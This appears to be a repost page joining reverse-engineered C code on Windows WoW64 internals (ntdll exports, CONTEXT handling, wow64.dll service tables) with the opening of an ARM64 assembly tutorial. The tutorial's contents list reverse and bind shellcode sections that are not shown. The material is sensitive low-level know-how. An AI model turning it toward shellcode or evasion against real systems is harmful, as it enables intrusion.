PS_NTDLL_EXPORT_ITEM NtdllExports[] = {
//
// 19 exports on x64
// 14 exports on ARM64
//
};
PVOID PsWowX86SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowX86Exports[] = {
    { "LdrInitializeThunk",
      &PsWowX86SharedInformation[SharedNtdll32LdrInitializeThunk] },
    { "KiUserExceptionDispatcher",
      &PsWowX86SharedInformation[SharedNtdll32KiUserExceptionDispatcher] },
    { "KiUserApcDispatcher",
      &PsWowX86SharedInformation[SharedNtdll32KiUserApcDispatcher] },
    { "KiUserCallbackDispatcher",
      &PsWowX86SharedInformation[SharedNtdll32KiUserCallbackDispatcher] },
    { "RtlUserThreadStart",
      &PsWowX86SharedInformation[SharedNtdll32RtlUserThreadStart] },
    { "RtlpQueryProcessDebugInformationRemote",
      &PsWowX86SharedInformation[SharedNtdll32pQueryProcessDebugInformationRemote] },
    { "LdrSystemDllInitBlock",
      &PsWowX86SharedInformation[SharedNtdll32LdrSystemDllInitBlock] },
    { "RtlpFreezeTimeBias",
      &PsWowX86SharedInformation[SharedNtdll32RtlpFreezeTimeBias] },
};
#ifdef _M_ARM64
PVOID PsWowArm32SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowArm32Exports[] = {
//
// …
//
};
PVOID PsWowAmd64SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowAmd64Exports[] = {
//
// …
//
};
PVOID PsWowChpeX86SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowChpeX86Exports[] = {
//
// …
//
};
#endif // _M_ARM64
//
// …
//
typedef struct _PS_NTDLL_EXPORT_INFORMATION {
PPS_NTDLL_EXPORT_ITEM NtdllExports;
SIZE_T Count;
} PS_NTDLL_EXPORT_INFORMATION, *PPS_NTDLL_EXPORT_INFORMATION;
//
// RTL_NUMBER_OF(NtdllExportInformation)
// == 6
// == (SYSTEM_DLL_TYPE)PsSystemDllTotalTypes
//
PS_NTDLL_EXPORT_INFORMATION NtdllExportInformation[PsSystemDllTotalTypes] = {
{ NtdllExports, RTL_NUMBER_OF(NtdllExports) },
{ NtdllWowX86Exports, RTL_NUMBER_OF(NtdllWowX86Exports) },
#ifdef _M_ARM64
{ NtdllWowArm32Exports, RTL_NUMBER_OF(NtdllWowArm32Exports) },
{ NtdllWowAmd64Exports, RTL_NUMBER_OF(NtdllWowAmd64Exports) },
{ NtdllWowChpeX86Exports, RTL_NUMBER_OF(NtdllWowChpeX86Exports) },
#endif // _M_ARM64
//
// { NULL, 0 } for the rest…
//
};
typedef struct _PS_SYSTEM_DLL_INFO {
//
// Flags.
// Initialized statically.
//
USHORT Flags;
//
// Machine type of this WoW64 NTDLL.
// Initialized statically.
// Examples:
// - IMAGE_FILE_MACHINE_I386
// - IMAGE_FILE_MACHINE_ARMNT
//
USHORT MachineType;
//
// Unused, always 0.
//
ULONG Reserved1;
//
// Path to the WoW64 NTDLL.
// Initialized statically.
// Examples:
// - "\\SystemRoot\\SysWOW64\\ntdll.dll"
// - "\\SystemRoot\\SysArm32\\ntdll.dll"
//
UNICODE_STRING Ntdll32Path;
//
// Image base of the DLL.
// Initialized at runtime by PspMapSystemDll.
// Equivalent of:
// RtlImageNtHeader(BaseAddress)->
// OptionalHeader.ImageBase;
//
PVOID ImageBase;
//
// Contains DLL name (such as "ntdll.dll" or
// "ntdll32.dll") before runtime initialization.
// Initialized at runtime by MmMapViewOfSectionEx,
// called from PspMapSystemDll.
//
union {
PVOID BaseAddress;
PWCHAR DllName;
};
//
// Unused, always 0.
//
PVOID Reserved2;
//
// Section relocation information.
//
PVOID SectionRelocationInformation;
//
// Unused, always 0.
//
PVOID Reserved3;
} PS_SYSTEM_DLL_INFO, *PPS_SYSTEM_DLL_INFO;
typedef struct _PS_SYSTEM_DLL {
//
// _SECTION* object of the DLL.
// Initialized at runtime by PspLocateSystemDll.
//
union {
EX_FAST_REF SectionObjectFastRef;
PVOID SectionObject;
};
//
// Push lock.
//
EX_PUSH_LOCK PushLock;
//
// System DLL information.
// This part is returned by PsQuerySystemDllInfo.
//
PS_SYSTEM_DLL_INFO SystemDllInfo;
} PS_SYSTEM_DLL, *PPS_SYSTEM_DLL;
////////////////////////////////////////////////////////////////////////////////
// ntdll.dll
////////////////////////////////////////////////////////////////////////////////
ULONG
RtlpArchContextFlagFromMachine(
_In_ USHORT MachineType
)
/*++
Routine description:
    This routine translates the machine type to the
    architecture-specific CONTEXT flag.
Arguments:
    MachineType - One of IMAGE_FILE_MACHINE_* values.
Return Value:
    Context flag.
Note:
    RtlpArchContextFlagFromMachine can be found only in
    ntoskrnl.exe symbols, but from ntdll.dll disassembly
    it is obvious that this function is present there
    as well (probably __forceinline'd, or used as a macro).
--*/
{
switch (MachineType)
{
case IMAGE_FILE_MACHINE_I386:
return CONTEXT_i386;
case IMAGE_FILE_MACHINE_AMD64:
return CONTEXT_AMD64;
case IMAGE_FILE_MACHINE_ARMNT:
return CONTEXT_ARM;
case IMAGE_FILE_MACHINE_ARM64:
return CONTEXT_ARM64;
default:
return 0;
}
}
ULONG
RtlpGetLegacyContextLength(
_In_ ULONG ArchContextFlag,
_Out_opt_ PULONG SizeOfContext,
_Out_opt_ PULONG AlignOfContext
)
/*++
Routine description:
    This routine determines size and alignment of the
    architecture-specific CONTEXT structure.
Arguments:
    ArchContextFlag - Architecture-specific CONTEXT flag.
    SizeOfContext - Receives sizeof(CONTEXT).
    AlignOfContext - Receives __alignof(CONTEXT).
Return Value:
    Alignment of the CONTEXT structure.
Note:
    You can find corresponding DECLSPEC_ALIGN specifiers
    for each CONTEXT structure in the winnt.h (Windows SDK).
    By WOW64_CONTEXT_* here is meant an original CONTEXT
    structure for the specific architecture (as CONTEXT
    structures for other architectures are not available,
    because it is selected during compile-time).
--*/
{
ULONG SizeOf = 0;
ULONG AlignOf = 0;
switch (ArchContextFlag)
{
case CONTEXT_i386:
SizeOf = sizeof(WOW64_CONTEXT_i386);
AlignOf = __alignof(WOW64_CONTEXT_i386); // 4
break;
case CONTEXT_AMD64:
SizeOf = sizeof(WOW64_CONTEXT_AMD64);
AlignOf = __alignof(WOW64_CONTEXT_AMD64); // 16
break;
case CONTEXT_ARM:
SizeOf = sizeof(WOW64_CONTEXT_ARM);
AlignOf = __alignof(WOW64_CONTEXT_ARM); // 8
break;
case CONTEXT_ARM64:
SizeOf = sizeof(WOW64_CONTEXT_ARM64);
AlignOf = __alignof(WOW64_CONTEXT_ARM64); // 16
break;
}
if (SizeOfContext) {
*SizeOfContext = SizeOf;
}
if (AlignOfContext) {
*AlignOfContext = AlignOf;
}
return AlignOf;
}
PULONG
RtlpGetContextFlagsLocation(
_In_ PCONTEXT_UNION Context,
_In_ ULONG ArchContextFlag
)
/*++
Routine description:
    This routine returns a pointer to the "ContextFlags"
    member of the CONTEXT structure.
Arguments:
    Context - Architecture-specific CONTEXT structure.
    ArchContextFlag - Architecture-specific CONTEXT flag.
Return Value:
    Pointer to the "ContextFlags" member.
--*/
{
//
// ContextFlags is always the first member of the
// CONTEXT struct — except for AMD64.
//
switch (ArchContextFlag)
{
case CONTEXT_i386:
return &Context->X86.ContextFlags; // Context + 0x00
case CONTEXT_AMD64:
return &Context->X64.ContextFlags; // Context + 0x30
case CONTEXT_ARM:
return &Context->ARM.ContextFlags; // Context + 0x00
case CONTEXT_ARM64:
return &Context->ARM64.ContextFlags; // Context + 0x00
default:
//
// Assume first member (Context + 0x00).
//
return (PULONG)Context;
}
}
//
// Architecture-specific WoW64 structure,
// holding the machine type and context
// structure.
//
#define WOW64_CPURESERVED_FLAG_RESET_STATE 1
typedef struct _WOW64_CPURESERVED {
USHORT Flags;
USHORT MachineType;
//
// CONTEXT has different alignment for
// each architecture and its location
// is determined at runtime (see
// RtlWow64GetCpuAreaInfo below).
//
// CONTEXT Context;
// CONTEXT_EX ContextEx;
//
} WOW64_CPURESERVED, *PWOW64_CPURESERVED;
typedef struct _WOW64_CPU_AREA_INFO {
PCONTEXT_UNION Context;
PCONTEXT_EX ContextEx;
PVOID ContextFlagsLocation;
PWOW64_CPURESERVED CpuReserved;
ULONG ContextFlag;
USHORT MachineType;
} WOW64_CPU_AREA_INFO, *PWOW64_CPU_AREA_INFO;
NTSTATUS
RtlWow64GetCpuAreaInfo(
_In_ PWOW64_CPURESERVED CpuReserved,
_In_ ULONG Reserved,
_Out_ PWOW64_CPU_AREA_INFO CpuAreaInfo
)
/*++
Routine description:
    This routine returns architecture- and WoW64-specific
    information based on the CPU-reserved region. It is
    used mainly for fetching MachineType and the pointer
    to the architecture-specific CONTEXT structure (which
    is part of the WOW64_CPURESERVED structure). Because
    the CONTEXT structure has different size and alignment
    for each architecture, the pointer must be obtained
    dynamically.
Arguments:
    CpuReserved - WoW64 CPU-reserved region, usually located
        at NtCurrentTeb()->TlsSlots[WOW64_TLS_CPURESERVED] (slot 1)
    Reserved - Unused. All callers set this argument to 0.
    CpuAreaInfo - Receives the CPU-area information.
Return Value:
    STATUS_SUCCESS - on success
    STATUS_INVALID_PARAMETER - if CpuReserved contains invalid MachineType
--*/
{
    ULONG ContextFlag;
    ULONG SizeOfContext;
    ULONG AlignOfContext;
    PCONTEXT_UNION Context;

    //
    // In the ntdll.dll, this call is probably inlined, because
    // RtlpArchContextFlagFromMachine symbol is not present there.
    //
    ContextFlag = RtlpArchContextFlagFromMachine(CpuReserved->MachineType);
    if (!ContextFlag) {
        return STATUS_INVALID_PARAMETER;
    }

    RtlpGetLegacyContextLength(ContextFlag, &SizeOfContext, &AlignOfContext);

    //
    // CpuAreaInfo->Context = &CpuReserved->Context;
    // CpuAreaInfo->ContextEx = &CpuReserved->ContextEx;
    //
    Context = ALIGN_UP_POINTER_BY(
        (PUCHAR)CpuReserved + sizeof(WOW64_CPURESERVED),
        AlignOfContext
        );

    CpuAreaInfo->Context = Context;
    CpuAreaInfo->ContextEx = ALIGN_UP_POINTER_BY(
        (PUCHAR)Context + SizeOfContext + sizeof(CONTEXT_EX),
        sizeof(PVOID)
        );

    //
    // Presumably obtained via RtlpGetContextFlagsLocation (see above).
    //
    CpuAreaInfo->ContextFlagsLocation = RtlpGetContextFlagsLocation(Context, ContextFlag);
    CpuAreaInfo->CpuReserved = CpuReserved;
    CpuAreaInfo->ContextFlag = ContextFlag;
    CpuAreaInfo->MachineType = CpuReserved->MachineType;

    return STATUS_SUCCESS;
}
////////////////////////////////////////////////////////////////////////////////
// wow64.dll
////////////////////////////////////////////////////////////////////////////////
//
// WOW64INFO, based on:
// wow64t.h (WRK: https://github.com/mic101/windows/blob/master/WRK-v1.2/public/internal/base/inc/wow64t.h#L269)
//
#define WOW64_CPUFLAGS_MSFT64 0x00000001
#define WOW64_CPUFLAGS_SOFTWARE 0x00000002
typedef struct _WOW64INFO {
ULONG NativeSystemPageSize;
ULONG CpuFlags;
ULONG Wow64ExecuteFlags;
ULONG Unknown1;
USHORT NativeMachineType;
USHORT EmulatedMachineType;
} WOW64INFO, *PWOW64INFO;
//
// Thread Local Storage (TLS) support. TLS slots are statically allocated.
// wow64tls.h (WRK: https://github.com/mic101/windows/blob/master/WRK-v1.2/public/internal/base/inc/wow64tls.h#L23)
// Note: Probably not all fields match their names on Windows 10.
//
#define WOW64_TLS_STACKPTR64 0 // contains 64-bit stack ptr when simulating 32-bit code
#define WOW64_TLS_CPURESERVED 1 // per-thread data for the CPU simulator
#define WOW64_TLS_INCPUSIMULATION 2 // Set when inside the CPU
#define WOW64_TLS_TEMPLIST 3 // List of memory allocated in thunk call.
#define WOW64_TLS_EXCEPTIONADDR 4 // 32-bit exception address (used during exception unwinds)
#define WOW64_TLS_USERCALLBACKDATA 5 // Used by win32k callbacks
#define WOW64_TLS_EXTENDED_FLOAT 6 // Used in ia64 to pass in floating point
#define WOW64_TLS_APCLIST 7 // List of outstanding usermode APCs
#define WOW64_TLS_FILESYSREDIR 8 // Used to enable/disable the filesystem redirector
#define WOW64_TLS_LASTWOWCALL 9 // Pointer to the last wow call struct (Used when wowhistory is enabled)
#define WOW64_TLS_WOW64INFO 10 // Wow64Info address (structure shared between 32-bit and 64-bit code inside Wow64).
#define WOW64_TLS_INITIAL_TEB32 11 // A pointer to the 32-bit initial TEB
#define WOW64_TLS_PERFDATA 12 // A pointer to temporary timestamps used in perf measurement
#define WOW64_TLS_DEBUGGER_COMM 13 // Communicate with 32bit debugger for event notification
#define WOW64_TLS_INVALID_STARTUP_CONTEXT 14 // Used by IA64 to indicate an invalid startup context. After startup, it stores a pointer to the context.
#define WOW64_TLS_SLIST_FAULT 15 // Used to retry RtlpInterlockedPopEntrySList faults
#define WOW64_TLS_UNWIND_NATIVE_STACK 16 // Forces an unwind of the native 64-bit stack after an APC
#define WOW64_TLS_APC_WRAPPER 17 // Holds the Wow64 APC jacket routine
#define WOW64_TLS_IN_SUSPEND_THREAD 18 // Indicates the current thread is in the middle of NtSuspendThread. Used by software CPUs.
#define WOW64_TLS_MAX_NUMBER 19 // Maximum number of TLS slot entries to allocate
typedef struct _WOW64_ERROR_CASE {
ULONG Case;
NTSTATUS TransformedStatus;
} WOW64_ERROR_CASE, *PWOW64_ERROR_CASE;
typedef struct _WOW64_SERVICE_TABLE_DESCRIPTOR {
//
// struct _KSERVICE_TABLE_DESCRIPTOR {
//
// //
// // Pointer to a system call table (array of function pointers).
// //
//
// PULONG_PTR Base;
//
// //
// // Pointer to a system call count table.
// // This field has been set only on checked (debug) builds,
// // where the Count (with the corresponding system call index)
// // has been incremented with each system call.
// // On non-checked builds it is set to NULL.
// //
//
// PULONG Count;
//
// //
// // Maximum number of items in the system call table.
// // In ntoskrnl.exe it corresponds with the actual number
// // of system calls. In wow64.dll it is set to 4096.
// //
//
// ULONG Limit;
//
// //
// // Pointer to a system call argument table.
// // The elements in this table actually contain how many
// // bytes on the stack are assigned to the function parameters
// // for a particular system call.
// // On 32-bit systems, if you divide this number by 4, you’ll
// // get the number of arguments that the system call expects.
// //
//
// PUCHAR Number;
// };
//
KSERVICE_TABLE_DESCRIPTOR Descriptor;
//
// Extended fields of the WoW64 service table:
// Wow64HandleSystemServiceError
//
WOW64_ERROR_CASE ErrorCaseDefault;
PWOW64_ERROR_CASE ErrorCase;
} WOW64_SERVICE_TABLE_DESCRIPTOR, *PWOW64_SERVICE_TABLE_DESCRIPTOR;
#define WOW64_NTDLL_SERVICE_INDEX 0
#define WOW64_WIN32U_SERVICE_INDEX 1
#define WOW64_KERNEL32_SERVICE_INDEX 2
#define WOW64_USER32_SERVICE_INDEX 3
#define WOW64_SERVICE_TABLE_MAX 4
WOW64_SERVICE_TABLE_DESCRIPTOR ServiceTables[WOW64_SERVICE_TABLE_MAX];
typedef struct _WOW64_LOG_SERVICE
{
PVOID Reserved;
PULONG Arguments;
ULONG ServiceTable;
ULONG ServiceNumber;
NTSTATUS Status;
BOOLEAN PostCall;
} WOW64_LOG_SERVICE, *PWOW64_LOG_SERVICE;
NTSTATUS
Wow64HandleSystemServiceError(
_In_ NTSTATUS ExceptionStatus,
_In_ PWOW64_LOG_SERVICE LogService
)
/*++
Routine description:
This routine transforms exception from native system
call to WoW64-compatible NTSTATUS.
Arguments:
ExceptionStatus - NTSTATUS raised from executing system call.
LogService - Information about the WoW64 system call.
Return Value:
Transformed NTSTATUS.
--*/
{
PWOW64_SERVICE_TABLE_DESCRIPTOR ServiceTable;
PWOW64_ERROR_CASE ErrorCaseTable;
ULONG ErrorCase;
NTSTATUS TransformedStatus;
ErrorCaseTable = ServiceTables[LogService->ServiceTable].ErrorCase;
if (!ErrorCaseTable)
{
ErrorCaseTable = &ServiceTables[LogService->ServiceTable].ErrorCaseDefault;
}
ErrorCase = ErrorCaseTable[LogService->ServiceNumber].Case;
TransformedStatus = ErrorCaseTable[LogService->ServiceNumber].TransformedStatus;
switch (ErrorCase)
{
case 0:
return ExceptionStatus;
case 1:
NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(ExceptionStatus);
return ExceptionStatus;
case 2:
return TransformedStatus;
case 3:
NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(ExceptionStatus);
return TransformedStatus;
default:
return STATUS_INVALID_PARAMETER;
}
}

References

How does one retrieve the 32-bit context of a Wow64 program from a 64-bit process on Windows Server 2003 x64?
http://www.nynaeve.net/?p=191

Mixing x86 with x64 code
http://blog.rewolf.pl/blog/?p=102

Windows 10 on ARM
https://channel9.msdn.com/Events/Build/2017/P4171

Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching
http://rce.co/knockin-on-heavens-gate-dynamic-processor-mode-switching/

Closing “Heaven’s Gate”
http://www.alex-ionescu.com/?p=300

A Guide to ARM64 / AArch64 Assembly on Linux with Shellcodes and Cryptography

( Original text by odzhan )

Introduction

The Cortex-A76, codenamed “Enyo”, will be the first of three CPU cores from ARM designed to target the laptop market between 2018 and 2020. ARM already has a monopoly on handheld devices, and is now projected to take a share of the laptop and server markets. First, Apple announced in April 2018 its intention to replace Intel with ARM for its MacBook CPUs from 2020 onwards. Second, a company called Ampere started shipping a 64-bit ARM CPU for servers in September 2018 that’s intended to compete with Intel’s Xeon CPUs. Moreover, the Automotive Enhanced (AE) version of the A76, unveiled in the same month, will target applications like self-driving cars. The A76 will continue to support the A32 and T32 instruction sets, but only for unprivileged code. Privileged code (kernel, drivers, hypervisor) will only run in 64-bit mode. It’s clear that ARM intends to phase out support for 32-bit code with its A series. Developers of Linux distros have also decided to drop support for all 32-bit architectures, including ARM.

This post is an introduction to ARM64 assembly and will not cover any advanced topics. It will be updated periodically as I learn more, and if you have suggestions on how to improve the content, or you believe something needs correcting, feel free to email me.

If you just want the code shown in this post, look here.

Please refer to the ARM Architecture Reference Manual ARMv8, for ARMv8-A architecture profile for more comprehensive information about the ARMv8-A architecture. Everything I discuss, with the exception of the source code and GNU topics, can be found in the manual.

Table of contents

  1. ARM Architecture
    1. Profiles
    2. Operating Systems
    3. Registers
    4. Calling Convention
    5. Condition Flags
    6. Condition Codes
    7. Data Types
    8. Data Alignment
  2. A64 instruction set
    1. Arithmetic
    2. Logical and Move
    3. Load, Store and Addressing Modes
    4. Conditional
    5. Bit Manipulation
    6. Branch
    7. System
    8. x86 and A64 comparison
  3. GNU Assembler
    1. GCC assembly
    2. Comments
    3. Preprocessor Directives
    4. Symbolic Constants
    5. Structures and Unions
    6. Operators
    7. Macros
    8. Conditional assembly
  4. GNU Debugger
    1. Layout
    2. Commands
  5. Common operations
    1. Saving registers.
    2. Copying registers.
    3. Initialize register to zero.
    4. Initialize register to one.
    5. Initialize register to -1.
    6. Test register for FALSE or 0.
    7. Test register for TRUE or 1.
    8. Test register for -1.
  6. Linux Shellcode
    1. System Calls
    2. Tracing
    3. Execute /bin/sh
    4. Execute /bin/sh -c
    5. Reverse connect /bin/sh
    6. Bind /bin/sh to port
    7. Synchronized shell
  7. Encryption
    1. AES-128
    2. KECCAK
    3. GIMLI
    4. XOODOO
    5. ASCON
    6. SPECK
    7. SIMECK
    8. CHASKEY
    9. XTEA
    10. NOEKEON
    11. CHAM
    12. LEA
    13. CHACHA
    14. PRESENT
    15. LIGHTMAC
  8. Summary

1. ARM Architecture

ARM is a family of Reduced Instruction Set Computer (RISC) architectures for computer processors that has become the predominant CPU for smartphones, tablets, and most of the IoT devices being sold today. It is not just consumer electronics that use ARM. The CPU can be found in medical devices, cars, aeroplanes, and robots; it can be found in billions of devices. The popularity of ARM is due in part to the reduced cost of production and power efficiency. ARM Holdings Inc. is a fabless semiconductor company, which means it does not manufacture hardware. The company designs processor cores and licenses its technology as Intellectual Property (IP) to other semiconductor companies like ATMEL, NXP, and Samsung.

In this tutorial, I’ll be programming on “orca”, a Raspberry Pi (RPI) 3 running 64-bit Debian Linux. This RPI comes with a Cortex-A53, that can support privileged code in both 32 and 64-bit mode. The Cortex-A53 CPU is an ARMv8-A 64-bit core that has backward compatibility with ARMv7-A so that it can run the A32 and T32 instruction sets. Here’s a screenshot of output from lscpu.

There are currently two execution states you should be aware of.

AArch32
32-bit, with support for the T32 (Thumb) and A32 (ARM) instruction sets.
AArch64
64-bit, with support for the A64 instruction set.

This post only focuses on the A64 instruction set.

1.1 Profiles

There are three architecture profiles available, each one designed for a specific purpose. If you want to write shellcode, it’s safe to assume you’ll work primarily with the A series because it’s the only profile that supports a General Purpose Operating System (GPOS) such as Linux or Windows. A Real-Time Operating System (RTOS) is more likely to be found running on the R and M series.

Core  Profile          Application
A     Application      Supports a Virtual Memory System Architecture (VMSA) based on a Memory Management Unit (MMU). Found in high performance devices that run an operating system such as Windows, Linux, Android or iOS.
R     Real-time        Found in medical devices, PLC, ECU, avionics, robotics, where low latency and a high level of safety are required. For example, an electronic braking system in an automobile. Autonomous drones and Hunter Killers (HK).
M     Microcontroller  Supports a Protected Memory System Architecture (PMSA) based on a Memory Protection Unit (MPU). Found in ASICs, ASSPs, FPGAs, and SoCs for power management, I/O, touch screen, smart battery, and sensor controllers. Some drones use the M series. HK Aerial.

The vast majority of single-board computers run on the Cortex-A series because it has an MMU for translating virtual memory addresses to physical memory addresses required by most operating systems.

1.2 Operating Systems

An RTOS is time-critical whereas a GPOS isn’t. While I do not discuss writing code for an RTOS here, it’s important to know the difference because you’re not going to find Linux running on every ARM based device. Linux requires far too many resources to be suitable for a device with only 256KB of RAM. Certainly, Linux has a lot of support for peripheral devices, file-systems, dynamic loading of code, network connectivity, and user-interface support; all of this makes it ideal for internet connected handheld devices. However, you’re unlikely to find the same support in an RTOS because it is not a full OS in the sense that Linux is. An RTOS might only consist of a static library with support for task scheduling, Interprocess Communication (IPC), and synchronization.

Some RTOS such as QNX or VxWorks can be configured to support features normally found in a GPOS and it’s possible you will come across at least one of these in any vulnerability research. The following is a list of embedded operating systems you may wish to consider researching more about.

Open source

Proprietary

1.3 Registers

This post will only focus on using the general-purpose, zero and stack pointer registers, but not SIMD, floating point and vector registers. Most system calls only use general-purpose registers.

Name  Size     Description
Wn    32 bits  General-purpose registers 0-30
Xn    64 bits  General-purpose registers 0-30
WZR   32 bits  Zero register
XZR   64 bits  Zero register
SP    64 bits  Stack pointer

W denotes 32-bit registers while X denotes 64-bit registers.
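
The relationship between the two views can be sketched in C. This is only a rough model under my own naming (gpr_t, read_w and write_w are hypothetical, not part of any ARM header): Wn is the low half of Xn, and a write to Wn clears the upper 32 bits of Xn.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of one general-purpose register:
   Xn is the full 64 bits, Wn is a view of the low 32 bits. */
typedef struct { uint64_t x; } gpr_t;

/* Reading Wn returns the low half of Xn. */
uint32_t read_w(const gpr_t *r) {
    assert(r != NULL);
    return (uint32_t)r->x;
}

/* Writing Wn zero-extends: the upper 32 bits of Xn become zero. */
void write_w(gpr_t *r, uint32_t value) {
    assert(r != NULL);
    r->x = (uint64_t)value;
}
```

So a mov w0, w1 is enough to truncate a 64-bit value to 32 bits; no explicit masking is required.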

1.4 Calling convention

The following is applicable to Debian Linux. You may freely use x0-x18, but remember that if calling subroutines, they may use them as well.

Registers  Description
X0 – X7    arguments and return value
X8 – X18   temporary registers
X19 – X28  callee-saved registers
X29        frame pointer
X30        link register
SP         stack pointer

x0 – x7 are used to pass parameters and return values. The value of these registers may be freely modified by the called function (the callee) so the caller cannot assume anything about their content, even if they are not used in the parameter passing or for the returned value. This means that these registers are in practice caller-saved.

x8 – x18 are temporary registers for every function. No assumption can be made on their values upon returning from a function. In practice these registers are also caller-saved.

x19 – x28 are registers, that, if used by a function, must have their values preserved and later restored upon returning to the caller. These registers are known as callee-saved.

x29 can be used as a frame pointer and x30 is the link register. The callee should save x30 if it intends to call a subroutine.

1.5 Condition Flags

ARM has a “process state” with condition flags that affect the behaviour of some instructions. Branch instructions can be used to change the flow of execution. Some of the data processing instructions allow setting the condition flags with the S suffix, e.g. ANDS or ADDS. The flags are the Zero Flag (Z), the Carry Flag (C), the Negative Flag (N) and the Overflow Flag (V).

Flag  Description
N     Bit 31. Set if the result of an operation is negative. Cleared if the result is positive or zero.
Z     Bit 30. Set if the result of an operation is zero/equal. Cleared if non-zero/not equal.
C     Bit 29. Set if an instruction results in a carry (unsigned overflow). Cleared if no carry.
V     Bit 28. Set if an instruction results in a signed overflow. Cleared if no overflow.
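
To make the table concrete, here is a minimal C sketch of the flags a 32-bit ADDS would produce. The names PSTATE_N, PSTATE_Z, PSTATE_C, PSTATE_V and adds32_flags are my own for illustration; only the bit positions come from the table above.

```c
#include <assert.h>
#include <stdint.h>

/* Bit positions taken from the table: N=31, Z=30, C=29, V=28. */
#define PSTATE_N (1u << 31)
#define PSTATE_Z (1u << 30)
#define PSTATE_C (1u << 29)
#define PSTATE_V (1u << 28)

/* Illustrative model: flags set by ADDS Wd, Wn, Wm for a + b. */
uint32_t adds32_flags(uint32_t a, uint32_t b) {
    uint32_t r = a + b;          /* wraps modulo 2^32 */
    uint32_t flags = 0;

    if (r & 0x80000000u) flags |= PSTATE_N;  /* sign bit of the result */
    if (r == 0)          flags |= PSTATE_Z;  /* result is zero */
    if (r < a)           flags |= PSTATE_C;  /* unsigned carry out */
    /* Signed overflow: operands share a sign, result has the other one. */
    if (~(a ^ b) & (a ^ r) & 0x80000000u) flags |= PSTATE_V;

    /* A zero result can never be negative. */
    assert(!((flags & PSTATE_Z) && (flags & PSTATE_N)));
    return flags;
}
```

For example, 0xFFFFFFFF + 1 wraps to zero and sets Z and C, while 0x7FFFFFFF + 1 sets N and V because the signed result overflowed.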

1.6 Condition Codes

The A32 instruction set supports conditional execution for most of its operations. To improve performance, ARM removed support with A64. These conditional codes are now only effective with branch, select and compare instructions. This appears to be a disadvantage, but there are sufficient alternatives in the A64 set that are a distinct improvement.

Mnemonic  Description                          Condition flags
EQ        Equal                                Z set
NE        Not equal                            Z clear
CS or HS  Carry set (unsigned higher or same)  C set
CC or LO  Carry clear (unsigned lower)         C clear
MI        Minus                                N set
PL        Plus, positive or zero               N clear
VS        Overflow                             V set
VC        No overflow                          V clear
HI        Unsigned higher                      C set and Z clear
LS        Unsigned lower or same               C clear or Z set
GE        Signed greater than or equal         N and V the same
LT        Signed less than                     N and V differ
GT        Signed greater than                  Z clear, N and V the same
LE        Signed less than or equal            Z set, or N and V differ
AL        Always. Normally omitted.            Any
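
The table translates almost directly into code. The following is a sketch in C of how each condition could be evaluated from the four flags; nzcv_t, cond_t and cond_holds are names I made up for this example.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical container for the four condition flags. */
typedef struct { bool n, z, c, v; } nzcv_t;

typedef enum {
    COND_EQ, COND_NE, COND_CS, COND_CC, COND_MI, COND_PL, COND_VS, COND_VC,
    COND_HI, COND_LS, COND_GE, COND_LT, COND_GT, COND_LE, COND_AL
} cond_t;

/* Returns true when the condition is satisfied by the given flags. */
bool cond_holds(cond_t cond, nzcv_t f) {
    switch (cond) {
    case COND_EQ: return f.z;
    case COND_NE: return !f.z;
    case COND_CS: return f.c;                 /* also HS */
    case COND_CC: return !f.c;                /* also LO */
    case COND_MI: return f.n;
    case COND_PL: return !f.n;
    case COND_VS: return f.v;
    case COND_VC: return !f.v;
    case COND_HI: return f.c && !f.z;
    case COND_LS: return !f.c || f.z;
    case COND_GE: return f.n == f.v;
    case COND_LT: return f.n != f.v;
    case COND_GT: return !f.z && f.n == f.v;
    case COND_LE: return f.z || f.n != f.v;
    case COND_AL: return true;
    }
    assert(!"unknown condition code");
    return false;
}
```

After cmp x0, x1 with x0 = 1 and x1 = 2, only N is set, so LT, LO and LS hold while GE and HI do not.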

1.7 Data Types

A “word” on x86 is 16-bits and a “doubleword” is 32-bits. A “word” for ARM is 32-bits and a “doubleword” is 64-bits.

Type Size
Byte 8 bits
Half-word 16 bits
Word 32 bits
Doubleword 64 bits
Quadword 128 bits

1.8 Data Alignment

The alignment of sp must be two times the size of a pointer. For AArch32 that’s 8 bytes, and for AArch64 it’s 16 bytes.
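
In practice this means the amount subtracted from sp should be rounded up to a multiple of 16 on AArch64. A small sketch in C, where align_up and aarch64_frame_size are helper names I invented for illustration:

```c
#include <assert.h>
#include <stddef.h>

/* Round size up to the next multiple of alignment (a power of two). */
size_t align_up(size_t size, size_t alignment) {
    assert(alignment != 0 && (alignment & (alignment - 1)) == 0);
    return (size + alignment - 1) & ~(alignment - 1);
}

/* Bytes to subtract from sp on AArch64 for a frame needing `size` bytes. */
size_t aarch64_frame_size(size_t size) {
    return align_up(size, 16);
}
```

A function that needs 20 bytes of locals would therefore reserve 32 bytes with sub sp, sp, 32.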

2. A64 Instruction Set

Like all previous ARM architectures, ARMv8-A is a load/store architecture. Data processing instructions do not operate directly on data in memory as we find with the x86 architecture. The data is first loaded into registers, modified, and then stored back in memory or simply discarded once it’s no longer required. Most data processing instructions use one destination register and two source operands. The general format can be considered as the instruction, followed by the operands, as follows:

Instruction Rd, Rn, Operand2

Rd is the destination register. Rn is the register that is operated on. The use of R indicates that the registers can be either X or W registers. Operand2 might be a register, a modified register, or an immediate value.

2.1 Arithmetic

The following instructions can be used for arithmetic, stack allocation and addressing of memory, control flow, and initialization of registers or variables.

Mnemonic Operands Instruction
ADD{S} (immediate) Rd, Rn, #imm{, shift} Add (immediate) adds a register value and an optionally-shifted immediate value, and writes the result to the destination register.
ADD{S} (extended register) Rd, Rn, Rm{, extend {#amount}} Add (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount, and writes the result to the destination register. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword.
ADD{S} (shifted register) Rd, Rn, Rm{, shift #amount} Add (shifted register) adds a register value and an optionally-shifted register value, and writes the result to the destination register.
ADR Xd, rel Form PC-relative address adds an immediate value to the PC value to form a PC-relative address, and writes the result to the destination register.
